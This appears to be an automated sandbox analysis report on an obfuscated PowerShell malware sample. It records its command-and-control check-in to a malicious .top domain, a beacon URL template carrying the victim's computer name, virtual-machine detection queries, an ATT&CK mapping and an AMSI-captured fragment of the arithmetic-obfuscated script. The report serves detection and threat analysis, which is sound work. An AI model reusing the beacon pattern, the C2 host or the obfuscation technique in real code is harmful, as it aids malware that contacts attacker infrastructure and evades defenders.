
Windows Analysis Report
ryOpDCeOHz.ps1

Overview

General Information

Sample name: ryOpDCeOHz.ps1
Analysis ID: 1556310
MD5: b551ce903d61eebc28085b06a85c9af1
SHA1: d7a8cfb2bff805e931f737d5031117d001d109a8
SHA256: 6074c8778c3efd5bf30622cce9dbd59a86a82047b131fa08d45b2ced417b3e4f

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Sigma rule match | Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", ProcessId: 7652, ProcessName: powershell.exe
Sigma rule match | Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", ProcessId: 7652, ProcessName: powershell.exe
Suricata IDS alerts

Timestamp                        | SID     | Severity | Classtype                            | Source IP     | Source Port | Destination IP | Destination Port | Protocol
2024-11-15T09:34:06.667360+0100  | 2856654 | 1        | A Network Trojan was detected        | 192.168.11.20 | 49739       | 206.188.196.37 | 80               | TCP
2024-11-15T09:34:05.698762+0100  | 2859003 | 1        | Domain Observed Used for C2 Detected | 192.168.11.20 | 60889       | 1.1.1.1        | 53               | UDP


AV Detection

Source: http://gidcldeaccadneh.top | Avira URL Cloud: Label: malware
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Network traffic | Suricata IDS: 2859003 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:60889 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.11.20:49739 -> 206.188.196.37:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 206.188.196.37
Source: Joe Sandbox View | ASN Name: DEFENSE-NETUS
Source: global traffic | HTTP traffic detected: GET /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: gidcldeaccadneh.top Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: gidcldeaccadneh.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints13
Source: classification engine | Classification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvb4me13.rd2.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $4tsh3rv1n2lg0dz.(([char[]]@((-505+(6092-(12385-6865))),(880563/(71579459/(18051-(-275+(9777453/1051))))),(-188+(-1976+2276)),(213444/(8715-6951)),(684180/8145),(3483-3372)) -join ''))( $flse0ajpcbq8u7t ) $4tsh3rv1n2lg0dz.((-join (@((387059/5777),(-5017+(3110875/(-2880+3487))),(4229-(10634-6516)),(876875/7625),(330775/3275))| ForEach-Object { [char]$_ })))()$pznekuqyc34wrsl.(([char[]]@((7366-7299),(809892/(-2337+9836)),(-7825+(64694272/(2213+(-2811+8750)))),(-9868+(57691757/5779)),(5187-(6581-(7705-6210)))) -join ''))()[byte[]] $fqpxh9l42e61joz = $flse0ajpcbq8u7t.((-join (@((299-(584585/(5248-2529))),(448551/4041),(1246-(249191/211)),(-2212+(9192352/(8374288/2119))),(130074/1141),(5121-5024),(1860-1739))| ForEach-Object { [char]$_ })))() $b7cyefgw4m8lisr=$fqpxh9l42e61joz return $b7cyefgw4m8lisr}[System.Text.Encoding]::ascii.((-join (@((84987/(6283053/(582639/(176268/(255+(-7979+(21557280/(8870-6555)))))))),(946370/9370),(4606-4490),(176956/2132),(-3086+(-1742+(7409-2465))),(2259-2145),(9481-9376),(-2698+2808),(608-(3035-2530)))| ForEach-Object { [char]$_ })))((5uvim0x2sylp9367qrhofatne1b "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb8 source: powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557CFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.6015657443.000001A53D813000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557DA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP; source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000000.00000002.6015657443.000001A53D813000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD3AF4D2A5 pushad ; iretd 0_2_00007FFD3AF4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD3B062300 pushad ; iretd 0_2_00007FFD3B06232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD3B067933 push ebx; retf 0_2_00007FFD3B06794A

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9924
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.6054715501.000001A558115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.6052454796.000001A557CD9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557D4E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.6052454796.000001A557CD9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557D4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.6052454796.000001A557D4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (2) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (1) | OS Credential Dumping | Security Software Discovery (21) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | DLL Side-Loading (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (11) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
(Numbers in parentheses are the report's per-technique counts; techniques without a number had no matching signature.)
Source | Detection | Scanner | Label | Link
ryOpDCeOHz.ps1 | 11% | ReversingLabs | Script-Python.Trojan.Heuristic |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://crlft.com/prl/pMicT | 0% | Avira URL Cloud | safe |
http://gidcldeaccadneh.top | 100% | Avira URL Cloud | malware |
http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe |
https://go.micro | 0% | Avira URL Cloud | safe |
http://pesterbdd.com/images/Pester.pngXz | 0% | Avira URL Cloud | safe |
https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe |
http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints13 | 0% | Avira URL Cloud | safe |
http://crl.X | 0% | Avira URL Cloud | safe |
http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe |
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 64.233.185.105 | true | false | | high
gidcldeaccadneh.top | 206.188.196.37 | true | true | | unknown

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://www.google.com/ | false | | high
URLs from memory and binaries:
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com/intl/en/about/products?tab=wh | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540756000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.X | powershell.exe, 00000000.00000002.6052454796.000001A557DA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
